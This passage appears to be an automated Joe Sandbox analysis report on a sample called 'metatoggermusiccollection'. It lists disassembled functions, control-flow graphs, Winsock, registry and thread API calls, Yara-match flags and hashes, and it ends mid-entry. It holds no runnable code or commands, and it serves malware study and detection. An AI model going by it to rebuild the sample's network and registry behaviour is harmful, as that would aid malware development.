                                                                            • Instruction Fuzzy Hash: 77316BB1944705EFD360DF65C984B26BBE8FB48724F004A2EF95683A80DB74D811CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 964 2ad2b95-2ad2baf 965 2ad2bc7-2ad2bcb 964->965 966 2ad2bb1-2ad2bb9 call 2ae0a50 964->966 967 2ad2bcd-2ad2bd0 965->967 968 2ad2bdf 965->968 975 2ad2bbf-2ad2bc2 966->975 967->968 970 2ad2bd2-2ad2bdd call 2ae0a50 967->970 971 2ad2be2-2ad2c11 WSASetLastError WSARecv call 2ada43c 968->971 970->975 977 2ad2c16-2ad2c1d 971->977 978 2ad2d30 975->978 980 2ad2c2c-2ad2c32 977->980 981 2ad2c1f-2ad2c2a call 2ae0a50 977->981 979 2ad2d32-2ad2d38 978->979 983 2ad2c34-2ad2c39 call 2ae0a50 980->983 984 2ad2c46-2ad2c48 980->984 991 2ad2c3f-2ad2c42 981->991 983->991 985 2ad2c4f-2ad2c60 call 2ae0a50 984->985 986 2ad2c4a-2ad2c4d 984->986 985->979 989 2ad2c66-2ad2c69 985->989 986->989 994 2ad2c6b-2ad2c6d 989->994 995 2ad2c73-2ad2c76 989->995 991->984 994->995 996 2ad2d22-2ad2d2d call 2ad1996 994->996 995->978 997 2ad2c7c-2ad2c9a call 2ae0a50 call 2ad166f 995->997 996->978 1004 2ad2cbc-2ad2cfa WSASetLastError select call 2ada43c 997->1004 1005 2ad2c9c-2ad2cba call 2ae0a50 call 2ad166f 997->1005 1011 2ad2cfc-2ad2d06 call 2ae0a50 1004->1011 1012 2ad2d08 1004->1012 1005->978 1005->1004 1019 2ad2d19-2ad2d1d 1011->1019 1015 2ad2d0a-2ad2d12 call 2ae0a50 1012->1015 1016 2ad2d15-2ad2d17 1012->1016 1015->1016 1016->978 1016->1019 1019->971
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2BE4
                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02AD2C07
                                                                              • Part of subcall function 02ADA43C: WSAGetLastError.WS2_32(00000000,?,?,02AD2A51), ref: 02ADA44A
                                                                            • WSASetLastError.WS2_32 ref: 02AD2CD3
                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02AD2CE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Recvselect
                                                                            • String ID: 3'
                                                                            • API String ID: 886190287-280543908
                                                                            • Opcode ID: 2092e86580cd145e0f0559ae66a92a1a73afda5040eb7b000a577b74ae3018eb
                                                                            • Instruction ID: 3b3b31b7813d2c2b97fa5f4c01f56c15c95b85393ec4a95fc02fdcac65cf5d4a
                                                                            • Opcode Fuzzy Hash: 2092e86580cd145e0f0559ae66a92a1a73afda5040eb7b000a577b74ae3018eb
                                                                            • Instruction Fuzzy Hash: F84149B19443058FDB20AF64C94476BBAE9AF84354F10091EE89BD7281EFB4D941CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402F22 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 00402F48
                                                                              • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                              • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                            • String ID: 6x
                                                                            • API String ID: 2057626494-281999241
                                                                            • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                            • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD29EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1100 2ad29ee-2ad2a06 1101 2ad2a0c-2ad2a10 1100->1101 1102 2ad2ab3-2ad2abb call 2ae0a50 1100->1102 1103 2ad2a39-2ad2a4c WSASetLastError closesocket call 2ada43c 1101->1103 1104 2ad2a12-2ad2a15 1101->1104 1111 2ad2abe-2ad2ac6 1102->1111 1110 2ad2a51-2ad2a55 1103->1110 1104->1103 1106 2ad2a17-2ad2a36 call 2ae0a50 call 2ad2f50 1104->1106 1106->1103 1110->1102 1113 2ad2a57-2ad2a5f call 2ae0a50 1110->1113 1118 2ad2a69-2ad2a71 call 2ae0a50 1113->1118 1119 2ad2a61-2ad2a67 1113->1119 1124 2ad2aaf-2ad2ab1 1118->1124 1125 2ad2a73-2ad2a79 1118->1125 1119->1118 1120 2ad2a7b-2ad2aad ioctlsocket WSASetLastError closesocket call 2ada43c 1119->1120 1120->1124 1124->1102 1124->1111 1125->1120 1125->1124
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2A3B
                                                                            • closesocket.WS2_32 ref: 02AD2A42
                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02AD2A89
                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02AD2A97
                                                                            • closesocket.WS2_32 ref: 02AD2A9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                            • String ID:
                                                                            • API String ID: 1561005644-0
                                                                            • Opcode ID: 751bb92c44179c006008cc58d1b8719c45ae0e28ea3842972d304f0895ec108f
                                                                            • Instruction ID: 4677979be697335ad48e8d2b75756a7d4c14730d47be89013aa986cbd9019254
                                                                            • Opcode Fuzzy Hash: 751bb92c44179c006008cc58d1b8719c45ae0e28ea3842972d304f0895ec108f
                                                                            • Instruction Fuzzy Hash: 14212BB1940205ABEB20ABF8CA48B6AB7E9EF44315F104969ED17D3252EF74CD45CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1127 2ad1ba7-2ad1bcf call 2af5330 RtlEnterCriticalSection 1130 2ad1be9-2ad1bf7 RtlLeaveCriticalSection call 2ade263 1127->1130 1131 2ad1bd1 1127->1131 1134 2ad1bfa-2ad1c20 RtlEnterCriticalSection 1130->1134 1132 2ad1bd4-2ad1be0 call 2ad1b79 1131->1132 1139 2ad1c55-2ad1c6e RtlLeaveCriticalSection 1132->1139 1140 2ad1be2-2ad1be7 1132->1140 1136 2ad1c34-2ad1c36 1134->1136 1137 2ad1c38-2ad1c43 1136->1137 1138 2ad1c22-2ad1c2f call 2ad1b79 1136->1138 1141 2ad1c45-2ad1c4b 1137->1141 1138->1141 1145 2ad1c31 1138->1145 1140->1130 1140->1132 1141->1139 1143 2ad1c4d-2ad1c51 1141->1143 1143->1139 1145->1136
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD1BAC
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02AD1C13
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                            • String ID:
                                                                            • API String ID: 1633115879-0
                                                                            • Opcode ID: e5662efc7b8a5d10fe9e0417dedacf3c251d1fdb5539b6d87bb7a161031d028f
                                                                            • Instruction ID: 3358f0340a7784fca312331f04f933b6606297ce0c930e2d1d78b8859bbce45a
                                                                            • Opcode Fuzzy Hash: e5662efc7b8a5d10fe9e0417dedacf3c251d1fdb5539b6d87bb7a161031d028f
                                                                            • Instruction Fuzzy Hash: 9D21AE75A00204DFDB14CFA8C984B9ABBB5FF48714F108989ED1A97701DB74E901CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2EEE
                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02AD2EFD
                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02AD2F0C
                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02AD2F36
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 2093263913-0
                                                                            • Opcode ID: 8f0f03bb8ba3c79157bbfe61cfb1292eca616c0933d6e5a66be449dda5e2255c
                                                                            • Instruction ID: ac349f725b9e2417c008f1d593ac5fb1a2f001cac2fa9329e651470095183874
                                                                            • Opcode Fuzzy Hash: 8f0f03bb8ba3c79157bbfe61cfb1292eca616c0933d6e5a66be449dda5e2255c
                                                                            • Instruction Fuzzy Hash: 4B018871940204BBDB205FA5DC88F5AFBA9EB89761F008965FA19DB181DB74C801CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AD2D39: WSASetLastError.WS2_32(00000000), ref: 02AD2D47
                                                                              • Part of subcall function 02AD2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02AD2D5C
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2E6D
                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02AD2E83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Sendselect
                                                                            • String ID: 3'
                                                                            • API String ID: 2958345159-280543908
                                                                            • Opcode ID: af0cab9580b31422fa4d22e563d58d690a8b5137d019b856655c03387316d6fd
                                                                            • Instruction ID: 23257c46e1a85949acf8e11bb8a1838d30fbc593e12c857abf7584d164c75d62
                                                                            • Opcode Fuzzy Hash: af0cab9580b31422fa4d22e563d58d690a8b5137d019b856655c03387316d6fd
                                                                            • Instruction Fuzzy Hash: 5E316DB1A003099BDF10EFB4C944BEEBBAAAF44324F00455ADC5AD7241EFB59555CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2AEA
                                                                            • connect.WS2_32(?,?,?), ref: 02AD2AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastconnect
                                                                            • String ID: 3'
                                                                            • API String ID: 374722065-280543908
                                                                            • Opcode ID: 4e5deaa4b315a2876c2fe71527036fd8f829c6499b4d58724abe6115bc0324a4
                                                                            • Instruction ID: 418af7dceb2990d7c98a8b36f92f6f4bddfd1262940aa2087af634aa99ff5385
                                                                            • Opcode Fuzzy Hash: 4e5deaa4b315a2876c2fe71527036fd8f829c6499b4d58724abe6115bc0324a4
                                                                            • Instruction Fuzzy Hash: 3F21AA74E001049BDF10EFB4C5447ADBBBAAF44324F004599DD1AA7281DFB45906CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 7fff3219f6052e1217ad0dc370d254bd3a0cdd97b3f4478ecb6b014b08ba001c
                                                                            • Instruction ID: 7943b8268c018a241ed573257060046febe82c1a76cd627392912c3713f61424
                                                                            • Opcode Fuzzy Hash: 7fff3219f6052e1217ad0dc370d254bd3a0cdd97b3f4478ecb6b014b08ba001c
                                                                            • Instruction Fuzzy Hash: DB512EB5905216DFCF05DF68D5406AABBB1FF08720F14819EE82A9B380DB74D911CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02AD36A7
                                                                              • Part of subcall function 02AD2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD2432
                                                                              • Part of subcall function 02AD2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD2445
                                                                              • Part of subcall function 02AD2420: RtlEnterCriticalSection.NTDLL(?), ref: 02AD2454
                                                                              • Part of subcall function 02AD2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2469
                                                                              • Part of subcall function 02AD2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2470
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1601054111-0
                                                                            • Opcode ID: dcce5809dde3ee28e6432afe84c02685f2780d1579f229f477188908a0fb5d0c
                                                                            • Instruction ID: 05363b4357e9daca1dd2b40cddd5b72026634aedd82b27b76587d476c576c614
                                                                            • Opcode Fuzzy Hash: dcce5809dde3ee28e6432afe84c02685f2780d1579f229f477188908a0fb5d0c
                                                                            • Instruction Fuzzy Hash: 7911BFBA100609EBDF219F54CC85BAA3B6AFF40354F104456FE1386290CF34E860CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE2030 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __beginthreadex.LIBCMT ref: 02AE2046
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02ADA8BC,00000000), ref: 02AE2077
                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02ADA8BC,00000000), ref: 02AE2085
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 1685284544-0
                                                                            • Opcode ID: c46a8e9eddd73db4568e432fc77c847a566035c41c29ca011791622021cc3578
                                                                            • Instruction ID: 9bee9d94754743e1b25f4367fcef0acfb3348db9ab8e1d842c66126bfa9dcf66
                                                                            • Opcode Fuzzy Hash: c46a8e9eddd73db4568e432fc77c847a566035c41c29ca011791622021cc3578
                                                                            • Instruction Fuzzy Hash: 88F04F712402016BEB209FA8DCC4B95B3A8AF48725F24056AF659D7294CBA1EC97DA90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(02B0727C), ref: 02AD1ABA
                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02AD1ACB
                                                                            • InterlockedExchange.KERNEL32(02B07280,00000000), ref: 02AD1AD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                            • String ID:
                                                                            • API String ID: 1856147945-0
                                                                            • Opcode ID: 6073f2baa91593d5e16d87d5b6c7de4e6b02c1b9d73459500b88e31b9836b69f
                                                                            • Instruction ID: ad807aba76934d978ca8a0985632435adcc6c991d7127184152f82ec750d4a15
                                                                            • Opcode Fuzzy Hash: 6073f2baa91593d5e16d87d5b6c7de4e6b02c1b9d73459500b88e31b9836b69f
                                                                            • Instruction Fuzzy Hash: 05D05B319802045BE25166E06D4EA74F72CEB0A711F400691FDAAC05D0EF55E52485AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040223C Relevance: 4.5, APIs: 3, Instructions: 12timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                            • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CommandLine$ArgvLocalTime
                                                                            • String ID:
                                                                            • API String ID: 3768950922-0
                                                                            • Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
                                                                            • Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD4BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4BF2
                                                                              • Part of subcall function 02AD1BA7: __EH_prolog.LIBCMT ref: 02AD1BAC
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1C13
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
                                                                              • Part of subcall function 02ADE02B: __EH_prolog.LIBCMT ref: 02ADE030
                                                                              • Part of subcall function 02ADE02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADE0AF
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02AD4CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                            • String ID:
                                                                            • API String ID: 1927618982-0
                                                                            • Opcode ID: 094398cb353edf1f911d031edff51a0c978ab12fb9187405df543b1e6a1ea7d9
                                                                            • Instruction ID: 4b4052f94a37464a72751f78ea55d23d52376896c50770da4d502ba242f4fdd7
                                                                            • Opcode Fuzzy Hash: 094398cb353edf1f911d031edff51a0c978ab12fb9187405df543b1e6a1ea7d9
                                                                            • Instruction Fuzzy Hash: 2D512771D04248DFDB15DFA8C984AEEBBB5FF08314F14816AE906AB351DB709A44CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2D47
                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02AD2D5C
                                                                              • Part of subcall function 02ADA43C: WSAGetLastError.WS2_32(00000000,?,?,02AD2A51), ref: 02ADA44A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Send
                                                                            • String ID:
                                                                            • API String ID: 1282938840-0
                                                                            • Opcode ID: 2027d9f0fdd7eb2236bf3d1fc5a1f14ee848154e66ddedaae4738bcdbb19edfc
                                                                            • Instruction ID: c2cf7224d66ee4221995e78c5a55281792071a2ec0a61a4dc98ddc1414ba91f4
                                                                            • Opcode Fuzzy Hash: 2027d9f0fdd7eb2236bf3d1fc5a1f14ee848154e66ddedaae4738bcdbb19edfc
                                                                            • Instruction Fuzzy Hash: 8A0171B5540209EFDB206F94898496BFAFDFB45364B20052EEC9A93200EF749D01CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD831D Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD833A
                                                                            • shutdown.WS2_32(?,00000002), ref: 02AD8343
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastshutdown
                                                                            • String ID:
                                                                            • API String ID: 1920494066-0
                                                                            • Opcode ID: 6fb7dffb08016b37e47dd84fc33a30cd09235af8e4a7bfebb139c66a7248a365
                                                                            • Instruction ID: 4eeb5595dda298fdaea5ed5e638165ea53011095e43852483cea933ba45746eb
                                                                            • Opcode Fuzzy Hash: 6fb7dffb08016b37e47dd84fc33a30cd09235af8e4a7bfebb139c66a7248a365
                                                                            • Instruction Fuzzy Hash: 62F05471A44314CFDB10AF98D545B5AB7E5BF09320F00485DEDAA97380DF74AC11CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                            • HeapDestroy.KERNEL32 ref: 004032AA
                                                                              • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                            • String ID:
                                                                            • API String ID: 2507506473-0
                                                                            • Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
                                                                            • Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004026BA Relevance: 3.0, APIs: 2, Instructions: 12registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegSetValueExA.KERNELBASE(?), ref: 0040BB89
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue
                                                                            • String ID:
                                                                            • API String ID: 3132538880-0
                                                                            • Opcode ID: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
                                                                            • Instruction ID: 3cbe291bb339146179499fcb751b8313bc5c9d0f62fdf094b2037c6fd71a0925
                                                                            • Opcode Fuzzy Hash: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
                                                                            • Instruction Fuzzy Hash: 47D0C971808002FFCB150B909E088293E79FB04350B200032E243708E4C7392462FAAF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD5119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD511E
                                                                              • Part of subcall function 02AD3D7E: htons.WS2_32(?), ref: 02AD3DA2
